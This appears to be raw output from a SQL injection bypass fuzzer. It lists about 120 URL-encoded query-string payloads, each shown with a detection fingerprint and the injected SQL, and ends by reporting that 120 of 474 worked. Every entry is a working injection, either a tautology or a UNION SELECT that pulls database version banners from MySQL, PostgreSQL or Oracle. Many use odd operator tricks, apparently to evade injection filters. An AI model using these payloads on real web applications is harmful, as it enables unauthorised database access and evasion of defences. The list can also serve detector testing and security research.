[+] -
[+] - id=1%261UE%3A+select+%2A+from+users+where+id%3D11%7C%7C1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1&Submit=Submit
 -
[+] -
[+] - id=1%261c%3A+select+%2A+from+users+where+id%3D1+%2B1+or+1%3D1+--+1&Submit=Submit
 -
[+] -
[+] - id=1%29%261c%3A+select+%2A+from+users+where+id%3D1+%2B%281%29+or+1%3D1+--+1&Submit=Submit
 -
[+] -
[+] - id=1%29UE1%3A+select+%2A+from+users+where+id%3D1+%2B%281%29+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1&Submit=Submit
 -
[+] -
[+] - id=1%29UEv%3A+select+%2A+from+users+where+id%3D1+%2B%281%29+union+select+null%2Cbanner+from+v%24version+where+rownum%3D1+--+1&Submit=Submit
 -
[+] -
[+] - id=1UE1k%3A+select+%2A+from+users+where+id%3D1+%2B1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1&Submit=Submit
 -
[+] -
[+] - id=1UEvk%3A+select+%2A+from+users+where+id%3D1+%2B1+union+select+null%2Cbanner+from+v%24version+where+rownum%3D1+--+1&Submit=Submit
 -
[+] -
[+] - id=1c%3A+select+%2A+from+users+where+id%3D11%3C1%23+union+select+1%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=1o%29%261%3A+select+%2A+from+users+where+id%3D1+%2B+%28%5C%2B%29+or+1%3D1+--+1&Submit=Submit
 -
[+] -
[+] - id=1o%29UE%3A+select+%2A+from+users+where+id%3D1+%2B+%28%5C%2B%29+union+select+null%2C%40%40VERSION+--+1&Submit=Submit
 -
[+] -
[+] - id=1o.UE%3A+select+%2A+from+users+where+id%3D1+%2B%5C%2B.+union+select+null%2C%40%40VERSION+--+1&Submit=Submit
 -
[+] -
[+] - id=1oUE1%3A+select+%2A+from+users+where+id%3D1+-1%3C%40+union+select+1%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=1oUEf%3A+select+%2A+from+users+where+id%3D1+%2B1%3C%40+union+select+version%28%29%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=1oUEv%3A+select+%2A+from+users+where+id%3D1+%2B1%3C%40+union+select+null%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=1oo%261%3A+select+%2A+from+users+where+id%3D1+%2B+%5C%2B%25%5C+or+1%3D1+--+1&Submit=Submit
 -
[+] -
[+] - id=1oo1%26%3A+select+%2A+from+users+where+id%3D1+%2B+%5C%2B%251+or+1%3D1+--+1&Submit=Submit
 -
[+] -
[+] - id=1oo1U%3A+select+%2A+from+users+where+id%3D1+%2B+%5C%2B%251+union+select+null%2C%40%40VERSION+--+1&Submit=Submit
 -
[+] -
[+] - id=1ooUE%3A+select+%2A+from+users+where+id%3D1+%2B+%5C%2B%2A%5C+union+select+null%2C%40%40VERSION+--+1&Submit=Submit
 -
[+] -
[+] - id=1oon%26%3A+select+%2A+from+users+where+id%3D1+%2B+%5C%2B%25%24+or+1%3D1+--+1&Submit=Submit
 -
[+] -
[+] - id=1oonU%3A+select+%2A+from+users+where+id%3D1+%2B+%5C%2B%2A%24+union+select+null%2C%40%40VERSION+--+1&Submit=Submit
 -
[+] -
[+] - id=s%26%26o1%3A+select+%2A+from+users+where+id%3D%271%27+or+%7C%7C%2F1%3D1+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26%28%29o%3A+select+%2A+from+users+where+id%3D%271%27+or+%28%5C%29%3D1+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26%28.%29%3A+select+%2A+from+users+where+id%3D%271%27+or+%28%5C.%29%3D1+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26%281%29%3A+select+%2A+from+users+where+id%3D%271%27+or+%281%29%3D1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26.o%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C.%3C%5C+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26.o1%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C.%3C1+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26.oU%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C.%3C%5C+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26.on%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C.%3C%24+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26.oo%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C.%3C+%3D1+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%261UE%3A+select+%2A+from+users+where+id%3D%271%27+%7C%7C1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%261c%3A+select+%2A+from+users+where+id%3D%271%27+++or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%261oo%3A+select+%2A+from+users+where+id%3D%271%27+or+1%5E%3D1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26n.o%3A+select+%2A+from+users+where+id%3D%271%27+or+%24+.%3D1+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26n1%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%24+1%3D1+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26n1U%3A+select+%2A+from+users+where+id%3D%271%27+or+%24+1%3D1+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26no%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%24%3C%5C+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26no.%3A+select+%2A+from+users+where+id%3D%271%27+or+%24%3C%5C.+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26noU%3A+select+%2A+from+users+where+id%3D%271%27+or+%24%3C%5C+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26noo%3A+select+%2A+from+users+where+id%3D%271%27+or+%24%2B%3C%24+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26o.%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C%5C.+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26o.U%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C%5C.+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26o1%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C1+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26o1U%3A+select+%2A+from+users+where+id%3D%271%27+or+%21%3C1+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26oUE%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C%5C+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26on%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C%24+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26onU%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C%24+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26oo1%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C+%3D1+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26ov%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%21%3C%40+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26ovU%3A+select+%2A+from+users+where+id%3D%271%27+or+%21%3C%40+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26v%281%3A+select+%2A+from+users+where+id%3D%271%27+or+%40%281%29%3D1+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26v1U%3A+select+%2A+from+users+where+id%3D%271%27+or+%40+1%3D1+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%26vvU%3A+select+%2A+from+users+where+id%3D%271%27+or+%40+%401%3D1+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%28UEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%28+union+select+%27a%27%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=s%2CUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%2C+union+select+%27a%27%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=s.UEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22.+union+select+%27a%27%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=s1UEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%221+union+select+%27a%27%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=s%3A+select+%2A+from+users+where+id%3D%271%27+or+%22%22%3C%40+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%3AUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3A+union+select+%27a%27%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=s%3As%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%22%3A%22_%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%3BUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3B+union+select+%27a%27%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=s%3Bs%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%22%3B%22_%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%3F%2Cvc%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%24%5B%22%5D%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=s%3FUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%3F+union+select+%27a%27%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=s%3Fs%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%22%3F%22_%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUE%26o%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%7C%7C%2F1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUE%28%29%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%28%5C%29%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUE%28.%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%28%5C.%29%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUE%281%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%281%29%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUE%2Cv%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%5C%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUE.%2C%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%5C.%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUE.c%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%5C.%23%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUE.o%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%5C.%251%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUE1k%3A+select+%2A+from+users+where+id%3D%271%27+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUE1n%3A+select+%2A+from+users+where+id%3D%271%27+union+select+1a%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUE1s%3A+select+%2A+from+users+where+id%3D%271%27+union+select+1%22%21%22%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUE%5Cc%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%5C%23%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUEn.%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%24+.%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUEnn%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%24+_%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUEnv%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%24%2A%24%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUEo%2C%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%2B%5C%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUEo.%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%2B%5C.%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUEo1%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%21%3C1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUEo%5C%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%2B%5C%23%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUEov%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%21%3C%40%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUEv1%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%40+1%2Cversion%28%29+--++1%27&Submit=Submit
 -
[+] -
[+] - id=sUEvk%3A+select+%2A+from+users+where+id%3D%271%27+++union+select+null%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sUEvv%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%40+%401%2Cversion%28%29+--++1%27&Submit=Submit
 -
[+] -
[+] - id=sn%3A+select+%2A+from+users+where+id%3D%271%27+union+select+%22%5B%22_%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=snUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%24+union+select+%27a%27%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=so%28%29%26%3A+select+%2A+from+users+where+id%3D%271%27+%2A%28%5C%29+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=so%28%29U%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%28%5C%29+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=so%28.%29%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%28%5C.%29+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=so%281%29%3A+select+%2A+from+users+where+id%3D%271%27+%2A%281%29+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=so..%26%3A+select+%2A+from+users+where+id%3D%271%27%3C%40..+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=so..U%3A+select+%2A+from+users+where+id%3D%271%27%3C%40..+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=so.n%26%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40.%24+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=so.nU%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40._+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=so1%261%3A+select+%2A+from+users+where+id%3D%271%27+%2B+1%7C%7C1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=so1UE%3A+select+%2A+from+users+where+id%3D%271%27+%2A1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=soc%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%40%3C%40%23+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=son.%26%3A+select+%2A+from+users+where+id%3D%271%27+%2A%24+.+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=son.U%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%24+.+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=son1%26%3A+select+%2A+from+users+where+id%3D%271%27+%2A%24+1+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sonn%26%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40%24_+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sonnU%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40%24_+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=soo%261%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%24%2B%25%5C+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=soo1%26%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40%261+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=soo1U%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40%261+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sooUE%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40%3C%40+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=soon%26%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%24%2B%25%24+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=soonU%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%24%2B%2A%24+union+select+1%2C%40%40VERSION+--+1%27&Submit=Submit
 -
[+] -
[+] - id=soov%26%3A+select+%2A+from+users+where+id%3D%271%27+%3C%40%26%40+or+1%3D1+--+1%27&Submit=Submit
 -
[+] -
[+] - id=soovU%3A+select+%2A+from+users+where+id%3D%271%27+%25%21%3C%40+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sos%3A+select+%2A+from+users+where+id%3D%271%27%3C%40%24%24+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sov%281%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%40%281%29+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sov1U%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%40+1+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sov1o%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%40+1%21+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=sovvU%3A+select+%2A+from+users+where+id%3D%271%27+%2B+%40+%401+union+select+1%2Cversion%28%29+--+1%27&Submit=Submit
 -
[+] -
[+] - id=svUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%40+union+select+%27a%27%2Cversion%28%29+--+1&Submit=Submit
 -
[+] -
[+] - id=s%7BUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%7B+union+select+%27a%27%2Cversion%28%29+--+1&Submit=Submit
 -
[*] 120 out of 474 worked
